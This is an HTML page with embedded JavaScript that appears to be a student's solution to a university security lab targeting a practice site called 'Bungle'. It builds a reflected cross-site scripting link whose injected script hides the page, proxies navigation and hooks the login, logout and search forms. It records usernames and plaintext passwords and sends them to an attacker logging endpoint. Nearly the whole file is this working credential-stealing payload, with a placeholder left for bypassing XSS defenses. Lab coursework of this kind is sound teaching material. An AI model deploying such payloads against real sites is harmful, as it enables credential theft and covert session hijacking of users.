<html><meta charset="utf-8"><script src="http://ajax.googleapis.com/ajax/lib

1. <html>
2. <meta charset="utf-8">
3. <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
4. <script>
5. // Extend this function:
6. function payload(attacker, prox_url) {
7. function log(data) {
8. console.log($.param(data))
9. $.get(attacker, data);
10. }
11. function proxy(href) {
12. $("html").load(href, function(){
13. $("html").show();
14. var username = $("#logged-in-user").text();
15. log({event: "nav", user: username, uri: href});
16. $("#query").val("PWND!");
17.  
18. //Handle Search from home page
19. $(".search-well > form").submit(function(evt) {
20. evt.preventDefault();
21. log({event: "search", test: "FUCK"});
22. var query = $("#query").val();
23. payload(attacker, "/search?q=" + query);
24. });
25.  
26. //handle log in from home page
27. $(".well > form").submit(function(evt) {
28. evt.preventDefault();
29. var tmp_username = $("#username").val();
30. var tmp_password = $("#userpass").val();
31. log({event: "login", user: tmp_username, pass: tmp_password});
32. $.post("/login", "username="+tmp_username+"&password="+tmp_password, "text");
33. setTimeout(function() {payload(attacker, ".");}, 300);
34. });
35.  
36. //handle logout from anywhere
37. $(".navbar-form").submit(function(evt) {
38. evt.preventDefault();
39. log({event: "logout", user: username});
40. $.post("/logout", "true");
41. setTimeout(function() {payload(attacker, ".");}, 300);
42. })
43.  
44. //handle search again button from search page
45. $("#search-again-btn").removeAttr("href");
46. $("#search-again-btn").click(function() {
47. payload(attacker, ".");
48. });
49. });
50. }
51. $("html").hide();
52. proxy(prox_url);
53. }
54.  
55. function makeLink(xssdefense, target, attacker, prox_url) {
56. if (xssdefense == 0) {
57. return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
58. encodeURIComponent("<script" + ">" + payload.toString() +
59. ";payload(\"" + attacker + "\", \"" + prox_url + "\");</script" + ">");
60. } else {
61. // Implement code to defeat XSS defenses here.
62. }
63. }
64.  
65. var xssdefense = 0;
66. var target = "http://bungle.cs461.cs.illinois.edu/";
67. var attacker = "http://127.0.0.1:31337/stolen";
68. $(function() {
69. var url = makeLink(xssdefense, target, attacker, ".");
70. $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
71. });
72. </script>
73. <h3></h3>
74. </html>